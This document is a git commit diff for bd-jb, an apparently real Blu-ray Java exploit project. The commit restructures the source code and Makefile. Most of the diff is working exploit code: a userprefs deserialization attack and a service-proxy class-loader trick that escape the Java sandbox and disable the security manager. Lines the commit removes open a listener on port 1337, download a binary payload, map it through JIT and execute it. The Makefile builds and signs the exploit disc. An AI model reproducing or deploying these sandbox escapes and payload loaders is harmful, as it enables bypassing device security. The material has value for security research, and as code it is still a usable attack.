Restructure source code and improve Makefile.

This commit is contained in:
Andy Nguyen 2021-11-04 17:58:27 +01:00
parent 94188d249f
commit fab3db6d51
24 changed files with 169 additions and 150 deletions

1
.gitignore vendored
View File

@ -1,4 +1,5 @@
.idea/
build/
tools/
lib/
disc/CERTIFICATE/id.bdmv

View File

@ -1,34 +1,57 @@
CLASSES = \
com/bdjb/ExploitXlet.java \
com/bdjb/Exploit.java \
com/bdjb/ExploitInterface.java \
com/bdjb/ExploitUserPrefsImpl.java \
com/bdjb/ExploitServiceProxyImpl.java \
com/bdjb/IxcProxyImpl.java \
com/bdjb/ServiceInterface.java \
com/bdjb/ServiceImpl.java \
com/bdjb/ProviderAccessorImpl.java \
com/bdjb/PayloadClassLoader.java \
com/bdjb/Payload.java \
com/bdjb/UnsafeInterface.java \
com/bdjb/UnsafeJdkImpl.java \
com/bdjb/UnsafeSunImpl.java \
com/bdjb/API.java \
com/bdjb/JIT.java \
com/bdjb/Screen.java \
BUILD = build
BDMV = bdmv
DISC = disc
LIB = lib
SRC = src
TOOLS = tools
all:
javac com/bdjb/PayloadClassLoaderSerializer.java && java com/bdjb/PayloadClassLoaderSerializer
javac -Xlint:all -Xlint:-options -source 1.4 -target 1.4 -bootclasspath "lib/rt.jar:lib/bdjstack.jar" $(CLASSES)
jar cf disc/BDMV/JAR/00000.jar com/bdjb/*.class com/bdjb/*.ser com/bdjb/bluray.ExploitXlet.perm
java -cp "tools/security.jar:tools/bcprov-jdk15-137.jar:tools/tools.jar" net.java.bd.tools.security.BDSigner disc/BDMV/JAR/00000.jar
java -jar tools/bdjo.jar bdmv/bdjo.xml disc/BDMV/BDJO/00000.bdjo
java -jar tools/MovieObject.jar bdmv/MovieObject.xml disc/BDMV/MovieObject.bdmv
java -jar tools/index.jar bdmv/index.xml disc/BDMV/index.bdmv
java -jar tools/id.jar bdmv/id.xml disc/CERTIFICATE/id.bdmv
CLASSES = \
$(SRC)/com/bdjb/ExploitXlet.java \
$(SRC)/com/bdjb/Exploit.java \
$(SRC)/com/bdjb/UnsafeInterface.java \
$(SRC)/com/bdjb/UnsafeJdkImpl.java \
$(SRC)/com/bdjb/UnsafeSunImpl.java \
$(SRC)/com/bdjb/API.java \
$(SRC)/com/bdjb/JIT.java \
$(SRC)/com/bdjb/Screen.java \
$(SRC)/com/bdjb/exploit/sandbox/ExploitSandboxInterface.java \
$(SRC)/com/bdjb/exploit/sandbox/ExploitUserPrefsImpl.java \
$(SRC)/com/bdjb/exploit/sandbox/ExploitServiceProxyImpl.java \
$(SRC)/com/bdjb/exploit/sandbox/IxcProxyImpl.java \
$(SRC)/com/bdjb/exploit/sandbox/ServiceInterface.java \
$(SRC)/com/bdjb/exploit/sandbox/ServiceImpl.java \
$(SRC)/com/bdjb/exploit/sandbox/ProviderAccessorImpl.java \
$(SRC)/com/bdjb/exploit/sandbox/PayloadClassLoader.java \
$(SRC)/com/bdjb/exploit/sandbox/Payload.java \
$(SRC)/com/bdjb/exploit/kernel/ExploitKernelInterface.java \
JFLAGS = -Xlint:all -Xlint:-options -source 1.4 -target 1.4 -bootclasspath "$(LIB)/rt.jar:$(LIB)/bdjstack.jar"
all: directory serialized classes jar bdmv
directory:
mkdir -p $(BUILD)
serialized:
javac -d $(BUILD) -sourcepath $(SRC) $(SRC)/com/bdjb/exploit/sandbox/PayloadClassLoaderSerializer.java
java -cp $(BUILD) com/bdjb/exploit/sandbox/PayloadClassLoaderSerializer $(BUILD)/com/bdjb/exploit/sandbox/PayloadClassLoader.ser
rm $(BUILD)/com/bdjb/exploit/sandbox/PayloadClassLoaderSerializer.class
classes:
javac -d $(BUILD) -sourcepath $(SRC) $(JFLAGS) $(CLASSES)
jar:
rm -rf $(BUILD)/jdk
cp $(SRC)/com/bdjb/bluray.ExploitXlet.perm $(BUILD)/com/bdjb/bluray.ExploitXlet.perm
cd $(BUILD) && jar cf ../$(DISC)/BDMV/JAR/00000.jar . && cd ..
java -cp "$(TOOLS)/security.jar:$(TOOLS)/bcprov-jdk15-137.jar:$(TOOLS)/tools.jar" net.java.bd.tools.security.BDSigner $(DISC)/BDMV/JAR/00000.jar
bdmv:
java -jar $(TOOLS)/bdjo.jar $(BDMV)/bdjo.xml $(DISC)/BDMV/BDJO/00000.bdjo
java -jar $(TOOLS)/MovieObject.jar $(BDMV)/MovieObject.xml $(DISC)/BDMV/MovieObject.bdmv
java -jar $(TOOLS)/index.jar $(BDMV)/index.xml $(DISC)/BDMV/index.bdmv
java -jar $(TOOLS)/id.jar $(BDMV)/id.xml $(DISC)/CERTIFICATE/id.bdmv
clean:
rm -rf jdk/internal/misc/*.class
rm -rf com/bdjb/*.class
rm -rf com/bdjb/*.ser
rm -rf build
rm -rf META-INF

View File

@ -1,93 +0,0 @@
/*
* Copyright (C) 2021 Andy Nguyen
*
* This software may be modified and distributed under the terms
* of the MIT license. See the LICENSE file for details.
*/
package com.bdjb;
import java.io.FileOutputStream;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.InetAddress;
import java.net.ServerSocket;
import java.net.Socket;
class Exploit implements Runnable {
static void init() {
Screen.println("[+] bd-jb by theflow");
Screen.println("[*] Disabling security manager...");
ExploitInterface[] exploits =
new ExploitInterface[] {new ExploitUserPrefsImpl(), new ExploitServiceProxyImpl()};
for (int i = 0; i < exploits.length; i++) {
try {
exploits[i].trigger();
if (System.getSecurityManager() == null) {
break;
}
} catch (Exception e) {
continue;
}
}
if (System.getSecurityManager() != null) {
Screen.println("[-] Error could not disable security manager.");
}
}
static void start() {
new Thread(new Exploit()).start();
}
public void run() {
if (System.getSecurityManager() != null) {
return;
}
try {
Screen.println("[*] Installing native API...");
API api = API.getInstance();
Screen.println("[*] Enabling JIT...");
JIT jit = JIT.getInstance();
Screen.println(
"[*] Listening for payload on "
+ InetAddress.getLocalHost().getHostAddress()
+ ":1337...");
ServerSocket serverSocket = new ServerSocket(1337);
Socket socket = serverSocket.accept();
Screen.println("[*] Downloading payload...");
InputStream inputStream = socket.getInputStream();
OutputStream outputStream = new FileOutputStream("/OS/HDD/download0/mnt_ada/payload.bin");
byte[] buf = new byte[8192];
int read;
while ((read = inputStream.read(buf)) > 0) {
outputStream.write(buf, 0, read);
}
outputStream.close();
inputStream.close();
socket.close();
Screen.println("[*] Mapping payload...");
long payload = jit.mapPayload("/OS/HDD/download0/mnt_ada/payload.bin", 0x4000);
Screen.println("[+] payload: " + Long.toHexString(payload));
Screen.println("[*] Executing payload...");
int ret = (int) api.call(payload, api.dlsym(API.LIBKERNEL_MODULE_HANDLE, "sceKernelDlsym"));
Screen.println("[+] Result: " + ret);
} catch (Exception e) {
Screen.println("[-] Error: " + e.getMessage());
}
}
}

69
src/com/bdjb/Exploit.java Normal file
View File

@ -0,0 +1,69 @@
/*
* Copyright (C) 2021 Andy Nguyen
*
* This software may be modified and distributed under the terms
* of the MIT license. See the LICENSE file for details.
*/
package com.bdjb;
import com.bdjb.exploit.sandbox.ExploitSandboxInterface;
import com.bdjb.exploit.sandbox.ExploitUserPrefsImpl;
import com.bdjb.exploit.sandbox.ExploitServiceProxyImpl;
import com.bdjb.exploit.kernel.ExploitKernelInterface;
import java.io.FileOutputStream;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.InetAddress;
import java.net.ServerSocket;
import java.net.Socket;
class Exploit implements Runnable {
static void init() {
Screen.println("[+] bd-jb by theflow");
Screen.println("[*] Escaping Java Sandbox...");
ExploitSandboxInterface[] exploits =
new ExploitSandboxInterface[] {new ExploitUserPrefsImpl(), new ExploitServiceProxyImpl()};
for (int i = 0; i < exploits.length; i++) {
try {
exploits[i].trigger();
if (System.getSecurityManager() == null) {
break;
}
} catch (Exception e) {
continue;
}
}
if (System.getSecurityManager() != null) {
Screen.println("[-] Error could not disable security manager.");
}
}
static void start() {
new Thread(new Exploit()).start();
}
public void run() {
if (System.getSecurityManager() != null) {
return;
}
Screen.println("[*] Exploiting kernel...");
ExploitKernelInterface[] exploits = new ExploitKernelInterface[] {};
for (int i = 0; i < exploits.length; i++) {
try {
if (exploits[i].trigger()) {
break;
}
} catch (Exception e) {
continue;
}
}
}
}

View File

@ -5,8 +5,8 @@
* of the MIT license. See the LICENSE file for details.
*/
package com.bdjb;
package com.bdjb.exploit.kernel;
interface ExploitInterface {
public void trigger() throws Exception;
public interface ExploitKernelInterface {
public boolean trigger() throws Exception;
}

View File

@ -0,0 +1,12 @@
/*
* Copyright (C) 2021 Andy Nguyen
*
* This software may be modified and distributed under the terms
* of the MIT license. See the LICENSE file for details.
*/
package com.bdjb.exploit.sandbox;
public interface ExploitSandboxInterface {
public boolean trigger() throws Exception;
}

View File

@ -5,7 +5,7 @@
* of the MIT license. See the LICENSE file for details.
*/
package com.bdjb;
package com.bdjb.exploit.sandbox;
import java.io.FileOutputStream;
import java.io.InputStream;
@ -16,19 +16,19 @@ import java.security.Provider;
import java.security.Security;
/** Implementation of the service+proxy exploit. */
class ExploitServiceProxyImpl implements ExploitInterface {
public class ExploitServiceProxyImpl implements ExploitSandboxInterface {
private static final String SERVICE_CLASS_NAME = "com.oracle.security.Service";
private static final String NEW_INSTANCE_METHOD_NAME = "newInstance";
private static final String NEW_INSTANCE_METHOD_SIGNATURE =
"(Ljava/lang/Object;)Ljava/lang/Object;";
private static final String PAYLOAD_CLASS_NAME = "com.bdjb.exploit.sandbox.Payload";
private static final String JAR_URL =
"file:///app0/bdjstack/lib/ext/../../../../disc/BDMV/JAR/00000.jar";
private static final String PAYLOAD_CLASS_NAME = "com.bdjb.Payload";
public void trigger() throws Exception {
public boolean trigger() throws Exception {
// Throw exception if class does not exist.
Class.forName(SERVICE_CLASS_NAME);
@ -56,5 +56,7 @@ class ExploitServiceProxyImpl implements ExploitInterface {
// Instantiate the payload class with all permissions to disable the security manager.
Class payloadClass = urlClassLoader.loadClass(PAYLOAD_CLASS_NAME);
payloadClass.newInstance();
return true;
}
}

View File

@ -5,7 +5,7 @@
* of the MIT license. See the LICENSE file for details.
*/
package com.bdjb;
package com.bdjb.exploit.sandbox;
import java.io.FileOutputStream;
import java.io.InputStream;
@ -14,16 +14,17 @@ import java.io.OutputStream;
import org.havi.ui.HSceneFactory;
/** Implementation of the userprefs deserialization exploit. */
class ExploitUserPrefsImpl implements ExploitInterface {
private static final String MNT_ADA_USERPREFS = "/OS/HDD/download0/mnt_ada/userprefs";
public class ExploitUserPrefsImpl implements ExploitSandboxInterface {
private static final String USERPREFS_FILE = "/OS/HDD/download0/mnt_ada/userprefs";
private static final String PAYLOAD_CLASS_LOADER_SER = "/com/bdjb/PayloadClassLoader.ser";
private static final String PAYLOAD_CLASS_LOADER_SER_FILE =
"/com/bdjb/exploit/sandbox/PayloadClassLoader.ser";
public void trigger() throws Exception {
public boolean trigger() throws Exception {
try {
// Overwrite userprefs with a serialized PayloadClassLoader.
InputStream inputStream = getClass().getResourceAsStream(PAYLOAD_CLASS_LOADER_SER);
OutputStream outputStream = new FileOutputStream(MNT_ADA_USERPREFS);
InputStream inputStream = getClass().getResourceAsStream(PAYLOAD_CLASS_LOADER_SER_FILE);
OutputStream outputStream = new FileOutputStream(USERPREFS_FILE);
byte[] buf = new byte[8192];
int read;
@ -42,15 +43,19 @@ class ExploitUserPrefsImpl implements ExploitInterface {
// Instantiate the payload class.
PayloadClassLoader.getInstance().newPayload();
return true;
}
} finally {
// Restore userprefs file.
String[][] preferences = new String[9][];
preferences[3] = new String[] {"26"};
ObjectOutputStream outputStream =
new ObjectOutputStream(new FileOutputStream(MNT_ADA_USERPREFS));
new ObjectOutputStream(new FileOutputStream(USERPREFS_FILE));
outputStream.writeObject(preferences);
outputStream.close();
}
return false;
}
}

View File

@ -5,7 +5,7 @@
* of the MIT license. See the LICENSE file for details.
*/
package com.bdjb;
package com.bdjb.exploit.sandbox;
import com.sony.gemstack.core.CoreAppContext;
import com.sony.gemstack.core.CoreIxcClassLoader;

View File

@ -5,7 +5,7 @@
* of the MIT license. See the LICENSE file for details.
*/
package com.bdjb;
package com.bdjb.exploit.sandbox;
import java.security.AccessController;
import java.security.PrivilegedActionException;

View File

@ -5,7 +5,7 @@
* of the MIT license. See the LICENSE file for details.
*/
package com.bdjb;
package com.bdjb.exploit.sandbox;
import java.io.ByteArrayOutputStream;
import java.io.InputStream;
@ -19,8 +19,8 @@ import java.security.ProtectionDomain;
class PayloadClassLoader extends ClassLoader implements Serializable {
private static final long serialVersionUID = 0x4141414141414141L;
private static final String PAYLOAD_CLASS_FILE = "/com/bdjb/Payload.class";
private static final String PAYLOAD_CLASS_NAME = "com.bdjb.Payload";
private static final String PAYLOAD_CLASS_FILE = "/com/bdjb/exploit/sandbox/Payload.class";
private static final String PAYLOAD_CLASS_NAME = "com.bdjb.exploit.sandbox.Payload";
private static PayloadClassLoader instance;

View File

@ -5,8 +5,9 @@
* of the MIT license. See the LICENSE file for details.
*/
package com.bdjb;
package com.bdjb.exploit.sandbox;
import com.bdjb.exploit.sandbox.PayloadClassLoader;
import java.io.FileOutputStream;
import java.io.ObjectOutputStream;
@ -14,8 +15,7 @@ import java.io.ObjectOutputStream;
class PayloadClassLoaderSerializer {
public static void main(String[] args) {
try {
ObjectOutputStream objectOutputStream =
new ObjectOutputStream(new FileOutputStream("com/bdjb/PayloadClassLoader.ser"));
ObjectOutputStream objectOutputStream = new ObjectOutputStream(new FileOutputStream(args[0]));
objectOutputStream.writeObject(new PayloadClassLoader());
objectOutputStream.close();
} catch (Exception e) {

View File

@ -5,7 +5,7 @@
* of the MIT license. See the LICENSE file for details.
*/
package com.bdjb;
package com.bdjb.exploit.sandbox;
import com.oracle.ProviderAccessor;
import com.oracle.ProviderAdapter;

View File

@ -5,7 +5,7 @@
* of the MIT license. See the LICENSE file for details.
*/
package com.bdjb;
package com.bdjb.exploit.sandbox;
import com.oracle.security.Service;
import java.util.List;

View File

@ -5,7 +5,7 @@
* of the MIT license. See the LICENSE file for details.
*/
package com.bdjb;
package com.bdjb.exploit.sandbox;
import java.rmi.Remote;
import java.rmi.RemoteException;